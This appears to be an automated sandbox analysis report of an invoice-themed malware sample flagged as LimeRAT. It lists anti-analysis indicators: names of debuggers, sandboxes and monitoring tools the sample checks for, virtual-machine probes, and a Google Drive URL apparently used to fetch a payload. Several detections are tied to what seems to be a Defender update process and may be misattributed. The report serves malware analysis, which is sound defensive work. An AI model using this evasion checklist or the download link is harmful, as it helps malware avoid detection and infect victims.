Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected generic Shellcode Injector

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Windows Security Disabler

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 00000023.00000003.6283231817.0000028BD6AFE000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: DBGHELP.DLLSBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXE
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmp	Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2628814510.0000000002AE0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1VRYTXUZ5YWXYVS_VDIFBNUH61TX5MQ4U
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627838947.0000000000643000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: QEMU-GA.EXE
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	Binary or memory string: \|ACCESSCHK.EXE\|ACCESSCHK64.EXE\|ACCESSENUM.EXE\|ACRORD32.EXE\|ADEXPLORER.EXE\|ADINSIGHT.EXE\|ADRESTORE.EXE\|APPLICATIONFRAMEHOST.EXE\|APPVCLIENT.EXE\|APPVLP.EXE\|ATBROKER.EXE\|AUDIODG.EXE\|AUTORUNS.EXE\|AUTORUNS64.EXE\|AUTORUNSC.EXE\|AUTORUNSC64.EXE\|BASH.EXE\|BGINFO.EXE\|BGINFO64.EXE\|BITSADMIN.EXE\|BROWSER_BROKER.EXE\|CALC.EXE\|CDB.EXE\|CERTUTIL.EXE\|CLOCKRES.EXE\|CLOCKRES64.EXE\|CMD.EXE\|CMDKEY.EXE\|CMSTP.EXE\|CONHOST.EXE\|CONSENT.EXE\|CONTIG.EXE\|CONTIG64.EXE\|CONTROL.EXE\|COREINFO.EXE\|CSC.EXE\|CSCRIPT.EXE\|CSI.EXE\|CSRSS.EXE\|CTFMON.EXE\|CTRL2CAP.EXE\|DASHOST.EXE\|DATAEXCHANGEHOST.EXE\|DBGVIEW.EXE\|DFSVC.EXE\|DISK2VHD.EXE\|DISKEXT.EXE\|DISKEXT64.EXE\|DISKSHADOW.EXE\|DLLHOST.EXE\|DNSCMD.EXE\|DNX.EXE\|DXCAP.EXE\|ESENTUTL.EXE\|EXPAND.EXE\|EXPLORER.EXE\|EXTEXPORT.EXE\|EXTRAC32.EXE\|FINDLINKS.EXE\|FINDLINKS64.EXE\|FINDSTR.EXE\|FONTDRVHOST.EXE\|FORFILES.EXE\|FXSSVC.EXE\|GPSCRIPT.EXE\|GPUP.EXE\|HANDLE.EXE\|HANDLE64.EXE\|HEX2DEC.EXE\|HEX2DEC64.EXE\|HH.EXE\|IE4UINIT.EXE\|IEEXEC.EXE\|INFDEFAULTINSTALL.EXE\|INSTALLUTIL.EXE\|JUNCTION.EXE\|JUNCTION64.EXE\|LDMDUMP.EXE\|LIVEKD.EXE\|LIVEKD64.EXE\|LOADORD.EXE\|LOADORD64.EXE\|LOADORDC.EXE\|LOADORDC64.EXE\|LOCKAPP.EXE\|LOGONSESSIONS.EXE\|LOGONSESSIONS64.EXE\|LSAISO.EXE\|LSASS.EXE\|MAKECAB.EXE\|MAVINJECT.EXE\|MFTRACE.EXE\|MICROSOFTEDGE.EXE\|MICROSOFTEDGECP.EXE\|MICROSOFTEDGESH.EXE\|MSBUILD.EXE\|MSCONFIG.EXE\|MSDEPLOY.EXE\|MSDT.EXE\|MSDTC.EXE\|MSHTA.EXE\|MSIEXEC.EXE\|MSXSL.EXE\|NETSH.EXE\|NLNOTES.EXE\|NLTEST.EXE\|NOTES.EXE\|NOTMYFAULT.EXE\|NOTMYFAULT64.EXE\|NOTMYFAULTC.EXE\|NOTMYFAULTC64.EXE\|NTFSINFO.EXE\|NTFSINFO64.EXE\|NTOSKRNL.EXE\|NVUDISP.EXE\|NVUHDA6.EXE\|ODBCCONF.EXE\|OPENWITH.EXE\|PAGEDFRG.EXE\|PCALUA.EXE\|PCWRUN.EXE\|PENDMOVES.EXE\|PENDMOVES64.EXE\|PIPELIST.EXE\|PIPELIST64.EXE\|POWERSHELL.EXE\|PRESENTATIONHOST.EXE\|PRINT.EXE\|PROCDUMP.EXE\|PROCDUMP64.EXE\|PROCEXP.EXE\|PROCEXP64.EXE\|PROCMON.EXE\|PSEXEC.EXE\|PSEXEC64.EXE\|PSFILE.EXE\|PSFILE64.EXE\|PSGETSID.EXE\|PSGETSID64.EXE\|PSINFO.EXE\|PSINFO64.EXE\|PSKILL.EXE\|PSKILL64.EXE\|PSLIST.EXE\|PSLIST64.EXE\|PSLOGGEDON.EXE\|PSLOGGEDON64.EXE\|PSLOGLIST.EXE\|PSLOGLIST64.EXE\|PSPASSWD.EXE\|PSPASSWD64.EXE\|PSPING.EXE\|PSPING64.EXE\|PSR.EXE\|PSSERVICE.EXE\|PSSERVICE64.EXE\|PSSHUTDOWN.EXE\|PSSUSPEND.EXE\|PSSUSPEND64.EXE\|PWSH.EXE\|RAMMAP.EXE\|RCSI.EXE\|REG.EXE\|REGASM.EXE\|REGDELNULL.EXE\|REGDELNULL64.EXE\|REGEDIT.EXE\|REGISTER-CIMPROVIDER\|REGJUMP.EXE\|REGSVCS.EXE\|REGSVR32.EXE\|REPLACE.EXE\|ROBOCOPY.EXE\|ROCCAT_SWARM.EXE\|RPCPING.EXE\|RUNDLL32.EXE\|RUNONCE.EXE\|RUNSCRIPTHELPER.EXE\|RUNTIMEBROKER.EXE\|SC.EXE\|SCRIPTRUNNER.EXE\|SDELETE.EXE\|SDELETE64.EXE\|SDIAGNHOST.EXE\|SEARCHFILTERHOST.EXE\|SEARCHINDEXER.EXE\|SEARCHPROTOCOLHOST.EXE\|SECURITYHEALTHSERVICE.EXE\|SERVICES.EXE\|SETTINGSYNCHOST.EXE\|SGRMBROKER.EXE\|SIGCHECK.EXE\|SIGCHECK64.EXE\|SIHOST.EXE\|SMARTSCREEN.EXE\|SMSS.EXE\|SPLWOW64.EXE\|SPOOLSV.EXE\|SPPSVC.EXE\|SQLDUMPER.EXE\|SQLPS.EXE\|SQLTOOLSPS.EXE\|STREAMS.EXE\|STREAMS64.EXE\|SURFACECOLORSERVICE.EXE\|SURFACESERVICE.EXE\|SVCHOST.EXE\|SYNCAPPVPUBLISHINGSERVER.EXE\|SYNCHOST.EXE\|SYSMON.EXE\|SYSMON64.EXE\|SYSTEMSETTINGSBROKER.EXE\|TASKHOSTW.EXE\|TASKMGR.EXE\|TCPVCON.EXE\|TCPVIEW.EXE\|TE.EXE\|TRACKER.EXE\|USBINST.EXE\|VBOXDRVINST.EXE\|VMCOMPUTE.EXE\|VMMAP.EXE\|VMMS.EXE\|VSJITD
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: SNIFFER.EXE
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	Binary or memory string: DIR_WATCH.DLL
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLA
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	Binary or memory string: *.LOG.\|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627838947.0000000000643000.00000004.00000020.sdmp	Binary or memory string: EROGRAM FILES\QEMU-GA\QEMU-GA.EXELLP*B
Source: MpSigStub.exe, 00000023.00000003.6269774597.0000028BC3EE4000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2628814510.0000000002AE0000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	Binary or memory string: FAKEHTTPSERVER.EXE
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1368

Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window / User API: threadDelayed 9947

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_0104EA88 sgdt fword ptr [eax]

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .AVHDX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	Binary or memory string: ARM_big_endianARM_legacyARM_unpredictable_16bitmachine_32bitmachineaggressive_trim_wsaggressiveimportamd64_imagearm_imageaslr_bit_setbound_imports_inside_imagebyte_reversed_hibyte_reversed_lowcalls_unimplemented_apichecks_if_debugged_documentedchecks_if_debugged_undocumentedchecks_ntglobalflagchecks_processheapchecks_teb_lasterrorchecks_teb_laststatuscode_on_stackdebug_strippeddeep_analysisdeep_apicall_limitdelay_load_imports_inside_imagedetects_virtualpcdetects_vmdetects_vmwaredirty_wx_branchdisable_apicall_limitdisable_drop_mz_onlydisable_dropper_rescandisable_io_redirectiondisable_microcodedisable_seh_limitdisable_static_unpackingdisable_thread_apicall_limitdisable_vmprotectdmg_decompressdmg_entrypointdmg_filealignmentdmg_imagebasedmg_imagesizedmg_importsdmg_invaliddatadmg_machinedmg_not_executable_imagedmg_notcontiguousdmg_optional_magicdmg_overlapping_sectionsdmg_pointertorawdatadmg_relocationsdmg_resource_levelsdmg_resource_namesdmg_resource_offsetdmg_resource_unordereddmg_sectionalignmentdmg_sizeofheadersdmg_sizeofrawdatadmg_special_sectiondmg_truncateddmg_unsupporteddmg_virtualaddressdmg_virtualsizedroppeddt_continue_after_unpackingdt_continue_after_unpacking_damageddt_error_bb_limitdt_error_failed_to_translatedt_error_heur_API_limitdt_error_heur_exit_criteriadt_error_invalid_opcodedt_error_loop_too_complexdt_error_not_enough_memorydt_error_too_many_operandsdt_error_too_many_prefixesdt_error_vmm_page_faultdynmem_API